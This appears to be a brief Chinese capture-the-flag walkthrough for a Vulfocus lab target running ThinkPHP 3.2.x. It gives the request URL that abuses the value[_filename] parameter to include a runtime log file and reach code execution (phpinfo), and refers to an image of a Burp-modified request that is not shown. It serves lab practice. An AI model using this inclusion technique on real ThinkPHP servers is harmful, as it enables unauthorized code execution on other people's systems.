Vulfocus靶场 | thinkphp3.2.X代码执行

这里直接放通关姿势了，想了解具体原理可以看下参考链接
通关姿势

访问URL：
http://123.58.224.8:20275
burp抓包修改如下图：

 
接着访问：
[url=http://123.58.224.8:20275/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_08_06.log]http://123.58.224.8:20275/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_08_06.log[/url]
后面的“22_08_06”是我复现的日期，你根据日期做修改即可
访问后出现phpinfo页面
直接搜索“flag”

 参考链接

【漏洞通报】ThinkPHP3.2.x RCE漏洞通报 (qq.com)

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！